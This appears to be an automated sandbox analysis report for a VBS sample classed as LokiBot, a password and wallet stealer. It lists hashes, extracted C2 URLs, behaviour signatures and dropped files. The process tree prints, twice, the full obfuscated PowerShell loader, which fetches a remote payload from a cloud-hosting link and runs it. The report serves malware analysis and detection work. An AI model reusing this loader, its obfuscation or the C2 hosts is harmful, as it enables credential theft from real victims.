Overview

overview

10

Static

static

1

Bnnebgers.vbs

windows7-x64

10

Bnnebgers.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-09-2024 07:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Bnnebgers.vbs

  • Size

    70KB

  • MD5

    5b6ded9dd4c8b33c96ec2dfccc4185ba

  • SHA1

    baf00d33cc29a38cedd43d1b483a24e5af5ef707

  • SHA256

    b39688815505416bd3ce779da8714b4eb492dea27036998ad90ddc439b8d554f

  • SHA512

    aeb3c167595408bb06a89a18c48fa4f097c5f4ad22b1fe0a8ddbb120d7b4b57939789a5b5427fdb3fe781c0bed78589bc618b724c0a73345aa502eb93c611b57

  • SSDEEP

    1536:susq1DWeDHqjpgA5JePv0wXvLr+s3NyQr0AyG1XLatJkYf:susq1qeZAHeP2s3BYU1Xqf

Score
10/10
lokibotcollectiondiscoveryexecutionspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://137.184.191.215/index.php/039

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 11 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bnnebgers.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burnets254 'Shudd$PrdikGEkspelSha eO Overb V nsaCoreglHande:Hvid i Um,dDAircoEAndvaOunderGFloppEPallbnAffejO Met UModulSL.ngw=DrikknPassaEHyperwSygel- OuncoTeglsb ,oguJP,ddeeSi icC odfuTSamme HistoSDr,geYUn elSStanitSte.seDav dmS ipj. DugpnElutrePoultTBilet.Ei htw He lEinchwb V,edcBedraLFiskeIArbejEMiljbNForskTHavre ');Iba ($Brnevold);Iba (Burnets254 'Jaege$Brugei BlsedUgeskeWeakeo tunng For eStvdrnProgroRadiuuJoyf sFster.CountH PinoeForziaOc,ondOpholeS ibsr Wa.nsLokal[ Ande$.viboRExteno StylsKarrykStyrgiAllerlResp.dUnchueNonre1Pukke9Bromi0P ten] Nonp= n nt$SynodAKri eaGigsfrSphaceBl sdnF,rbrdPandeeK,ritsD,kim ');$Stryges88=Burnets254 'Mowss$Miljtibre.fdC ckneSavelo R megBesagePu arnTacitoAutoruInexps Mand. to,aD OffeoDo.erwExtranSubmulTriamoDefeaaLiveddMiljbF CoeliVestelLa yve Seig(Bisul$Ri.hsHTelefy arebePatrit TurdoSystegD lprrMiliea rystpTigerhEspio,,tart$ ref PHastir TeddoFe.itxSkreseforl,n rbejeEuroetBervi) Sen ';$Proxenet=$Cylinderer;Iba (Burnets254 'Sodav$RecidGSpiflL S emOMlke.BT turaStroslRecir:AbstaA OverBFuddlYTuggeEbe ludPreha=Depor(TudseTBevgeEDispls,hototL tes-Badebp BeleAAdju tB topHJomfr Kvkk$ thypHero,R HaemOLavenX U reETimetNCoinseExcurt,atro)Filmn ');while (!$Abyed) {Iba (Burnets254 'Tangf$Pres.gPouchlGo,ifoPacifbProctaLumbrlMedia:DecalPRemicofunb,sForuriObovatC sariC.lluvEksisiChlo.sSlovetforeteArchinMarat=,emat$ ArmotTubberNonbiu RobieAot a ') ;Iba $Stryges88;Iba (Burnets254 ',adanSCollit Ariza AnelrSkruet Selv- KlbeS ndelHemateAndroeFri zpBukke Recr.4partr ');Iba (Burnets254 'Am.er$Gingeg U.gllBrddeoGarsibDisenaKonfolBogbr:Be.fiA DigibTittiyPrepaeEnd sdGenea=Pry,l(RosewT Phote abylsPhilotRdhov-BotanPVagtfa hirotDeli hI dst Downt$ uperPHemmerProp.oRevacxInstreBehann Ele.e SolatForhe)G ave ') ;Iba (Burnets254 'E,poi$OphavgUnheslDelkaoYokonbPerboa Oc.olSlem.:MikroRRollobCongrdT knoiGold.gHamatePilgrrPit ie fort= p us$TriumgFuglelpe ecoFofarbUndisa U,drlDefla:PuddlCBefolyfin,esSurtatZidaloI.dbls Mis.pAlarmaMbelfs apsom ,lou+Melod+folke% Cz.r$UnthiS P,ricSolarrBas.saAntndwLikablSwervsTaeni.Farvec eproFringuRegdnn Paratforl ') ;$Hyetograph=$Scrawls[$Rbdigere];}$Bemandingers=312136;$Baksningens=32559;Iba (Burnets254 'Brief$Aalekg rogrl FremoLaconb Embuatnde l Mill: MillKOffeniEncrimBenz ewoollrSuperiSi,ped evisg SnoriSkossa lokhnkaosj Fe.b=Tilk ChadaGKolo eTrskrtStbef-interCN umdoKnortnFo.tst,trigeHanken Unsat lith Bo il$Disp,PSaesorSneenoRe oixDayfleDisrunKetokeMaaletS,lla ');Iba (Burnets254 ' Skul$Rull.gFarvelUnu.toAuxocbV.redaKnsobl life:BouzoPMgt.grCentroHa ild Tan,uJunkikSporottypehu ForudForu v BesriRoyalkTilsjlRepute tarerDete.eSheetsSvige Shang=Auk i Repl[DuettSSno,byTllins rmout onteeOutpumHaveb. ryskCUdlgsoKamutndispovregreeMatchrEnsnatAlca ]Sudan:Slave:EjendFstaldr Incro estmLutetB utreaPenros UndeeCar,t6Pneum4 ljeS eptatPhymarEk.triBrevsn Pol,gSkvis(Ultim$StoreKTorskiNintum ilepe BalarD.triiBortrd SyrugSysteivizieaRensknBe be)Daudk ');Iba (Burnets254 'Tyros$ Agg g Ove l folkoTempobBarcoa UdsplProt : SkjtPNonineTranspHepatp RefleBasiarPentiwPauseoD rerrUdblstNort 4 G,nm Blost=Mul,i G,ne[GnallSPrin yPseudsGlycatplanteK,ttam Dio,.RadioTEklekeUn eaxRundetHuave.Drik.EAbbrenUdgancinagiopatacdAflevi StuvnK,nvegHasta] Slae: hitf:SivskA Min SProstCMurchIPaileIGlyco.nonheGTroldeDrilltOrthoSca,ast .litr FastiCeyl nRangfg egni(E,mer$DevilPNabo.rT areoS bcadpyramu Batik Applt Cragu Uno dl.rmev InfoiBantukforstlWaddieAtombrPyromeRestasAtte )Uraci ');Iba (Burnets254 ' Pryi$Fl.rigLin.elfatt.oS degbKombiaParoclSorbo:RegisS.rundcstemmrD tapu Tr,pt BegyaArthrtStrk oBegynrImput=under$Fe,emPDia.ee engpMedicpD,aloeNudamrJapanw.ayero,psolr Ballt .age4 abom. MellsBasinuInvalbTegnesMonottR adirSliveiBo genForskgSpec,(Pre o$SokleB Monoe UncamS natahemitn Besod FiltiD,zennHuskigImplue .ingr TrylsOccas,Sesq $ Bej.BP,agoaAnomakKumy,sVela,nLdig iKa minT ssagDivereTrldonKya,nsF,ott)Omreg ');Iba $Scrutator;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2836
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burnets254 'Shudd$PrdikGEkspelSha eO Overb V nsaCoreglHande:Hvid i Um,dDAircoEAndvaOunderGFloppEPallbnAffejO Met UModulSL.ngw=DrikknPassaEHyperwSygel- OuncoTeglsb ,oguJP,ddeeSi icC odfuTSamme HistoSDr,geYUn elSStanitSte.seDav dmS ipj. DugpnElutrePoultTBilet.Ei htw He lEinchwb V,edcBedraLFiskeIArbejEMiljbNForskTHavre ');Iba ($Brnevold);Iba (Burnets254 'Jaege$Brugei BlsedUgeskeWeakeo tunng For eStvdrnProgroRadiuuJoyf sFster.CountH PinoeForziaOc,ondOpholeS ibsr Wa.nsLokal[ Ande$.viboRExteno StylsKarrykStyrgiAllerlResp.dUnchueNonre1Pukke9Bromi0P ten] Nonp= n nt$SynodAKri eaGigsfrSphaceBl sdnF,rbrdPandeeK,ritsD,kim ');$Stryges88=Burnets254 'Mowss$Miljtibre.fdC ckneSavelo R megBesagePu arnTacitoAutoruInexps Mand. to,aD OffeoDo.erwExtranSubmulTriamoDefeaaLiveddMiljbF CoeliVestelLa yve Seig(Bisul$Ri.hsHTelefy arebePatrit TurdoSystegD lprrMiliea rystpTigerhEspio,,tart$ ref PHastir TeddoFe.itxSkreseforl,n rbejeEuroetBervi) Sen ';$Proxenet=$Cylinderer;Iba (Burnets254 'Sodav$RecidGSpiflL S emOMlke.BT turaStroslRecir:AbstaA OverBFuddlYTuggeEbe ludPreha=Depor(TudseTBevgeEDispls,hototL tes-Badebp BeleAAdju tB topHJomfr Kvkk$ thypHero,R HaemOLavenX U reETimetNCoinseExcurt,atro)Filmn ');while (!$Abyed) {Iba (Burnets254 'Tangf$Pres.gPouchlGo,ifoPacifbProctaLumbrlMedia:DecalPRemicofunb,sForuriObovatC sariC.lluvEksisiChlo.sSlovetforeteArchinMarat=,emat$ ArmotTubberNonbiu RobieAot a ') ;Iba $Stryges88;Iba (Burnets254 ',adanSCollit Ariza AnelrSkruet Selv- KlbeS ndelHemateAndroeFri zpBukke Recr.4partr ');Iba (Burnets254 'Am.er$Gingeg U.gllBrddeoGarsibDisenaKonfolBogbr:Be.fiA DigibTittiyPrepaeEnd sdGenea=Pry,l(RosewT Phote abylsPhilotRdhov-BotanPVagtfa hirotDeli hI dst Downt$ uperPHemmerProp.oRevacxInstreBehann Ele.e SolatForhe)G ave ') ;Iba (Burnets254 'E,poi$OphavgUnheslDelkaoYokonbPerboa Oc.olSlem.:MikroRRollobCongrdT knoiGold.gHamatePilgrrPit ie fort= p us$TriumgFuglelpe ecoFofarbUndisa U,drlDefla:PuddlCBefolyfin,esSurtatZidaloI.dbls Mis.pAlarmaMbelfs apsom ,lou+Melod+folke% Cz.r$UnthiS P,ricSolarrBas.saAntndwLikablSwervsTaeni.Farvec eproFringuRegdnn Paratforl ') ;$Hyetograph=$Scrawls[$Rbdigere];}$Bemandingers=312136;$Baksningens=32559;Iba (Burnets254 'Brief$Aalekg rogrl FremoLaconb Embuatnde l Mill: MillKOffeniEncrimBenz ewoollrSuperiSi,ped evisg SnoriSkossa lokhnkaosj Fe.b=Tilk ChadaGKolo eTrskrtStbef-interCN umdoKnortnFo.tst,trigeHanken Unsat lith Bo il$Disp,PSaesorSneenoRe oixDayfleDisrunKetokeMaaletS,lla ');Iba (Burnets254 ' Skul$Rull.gFarvelUnu.toAuxocbV.redaKnsobl life:BouzoPMgt.grCentroHa ild Tan,uJunkikSporottypehu ForudForu v BesriRoyalkTilsjlRepute tarerDete.eSheetsSvige Shang=Auk i Repl[DuettSSno,byTllins rmout onteeOutpumHaveb. ryskCUdlgsoKamutndispovregreeMatchrEnsnatAlca ]Sudan:Slave:EjendFstaldr Incro estmLutetB utreaPenros UndeeCar,t6Pneum4 ljeS eptatPhymarEk.triBrevsn Pol,gSkvis(Ultim$StoreKTorskiNintum ilepe BalarD.triiBortrd SyrugSysteivizieaRensknBe be)Daudk ');Iba (Burnets254 'Tyros$ Agg g Ove l folkoTempobBarcoa UdsplProt : SkjtPNonineTranspHepatp RefleBasiarPentiwPauseoD rerrUdblstNort 4 G,nm Blost=Mul,i G,ne[GnallSPrin yPseudsGlycatplanteK,ttam Dio,.RadioTEklekeUn eaxRundetHuave.Drik.EAbbrenUdgancinagiopatacdAflevi StuvnK,nvegHasta] Slae: hitf:SivskA Min SProstCMurchIPaileIGlyco.nonheGTroldeDrilltOrthoSca,ast .litr FastiCeyl nRangfg egni(E,mer$DevilPNabo.rT areoS bcadpyramu Batik Applt Cragu Uno dl.rmev InfoiBantukforstlWaddieAtombrPyromeRestasAtte )Uraci ');Iba (Burnets254 ' Pryi$Fl.rigLin.elfatt.oS degbKombiaParoclSorbo:RegisS.rundcstemmrD tapu Tr,pt BegyaArthrtStrk oBegynrImput=under$Fe,emPDia.ee engpMedicpD,aloeNudamrJapanw.ayero,psolr Ballt .age4 abom. MellsBasinuInvalbTegnesMonottR adirSliveiBo genForskgSpec,(Pre o$SokleB Monoe UncamS natahemitn Besod FiltiD,zennHuskigImplue .ingr TrylsOccas,Sesq $ Bej.BP,agoaAnomakKumy,sVela,nLdig iKa minT ssagDivereTrldonKya,nsF,ott)Omreg ');Iba $Scrutator;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2616
    • C:\Windows\syswow64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:2720

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Assimileringens.Lan
    Filesize

    448KB

    MD5

    fdb92df6a107cb2e9cbf0556fb7d9583

    SHA1

    fb1d9d5b30862f5eaf7e14b9ff9697d96500c71d

    SHA256

    0b63d26cb8e521b1e3264b3f0a208a94a32b027738dd94722562332f55a321dd

    SHA512

    2b22b4bb6e84e69fd7c0a7edcefc11761538f42a35f65b83be1de99fc932ba15d3e81d42471973b1ad0ca7b122e71e1f955cb8404badd269adca7fce679275ef

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3290804112-2823094203-3137964600-1000\0f5007522459c86e95ffcc62f32308f1_94ea1d76-6d7e-4d9e-abc7-ef9a6a2a9269
    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3290804112-2823094203-3137964600-1000\0f5007522459c86e95ffcc62f32308f1_94ea1d76-6d7e-4d9e-abc7-ef9a6a2a9269
    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A9ZKGZ1C3O5WVTUXIU3F.temp
    Filesize

    7KB

    MD5

    bb40ed3704842e8f55139fe373cdc637

    SHA1

    f09bc5b379d6721b8211f2c1b16b8467c51028f4

    SHA256

    9d218021e72875b418c78007ad438ae020c2d955317e5d839a84bb527f3d5ab3

    SHA512

    1b6478ff3b086f73105ee90378f218b07eeb927cc56798d9bb5d2b44872bd5e96203e57ef4a0598569ae2367794df77131113380d58cdd8439480cd9498f0184

    Download Submit

  • memory/2616-19-0x0000000006680000-0x000000000BE47000-memory.dmp

    Filesize

    87.8MB

    Download

  • memory/2720-42-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2720-41-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2836-8-0x000007FEF6230000-0x000007FEF6BCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2836-13-0x000007FEF64EE000-0x000007FEF64EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2836-15-0x000007FEF6230000-0x000007FEF6BCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2836-11-0x000007FEF6230000-0x000007FEF6BCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2836-10-0x000007FEF6230000-0x000007FEF6BCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2836-9-0x000007FEF6230000-0x000007FEF6BCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2836-4-0x000007FEF64EE000-0x000007FEF64EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2836-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2836-6-0x0000000002810000-0x0000000002818000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2836-7-0x000007FEF6230000-0x000007FEF6BCD000-memory.dmp

    Filesize

    9.6MB

    Download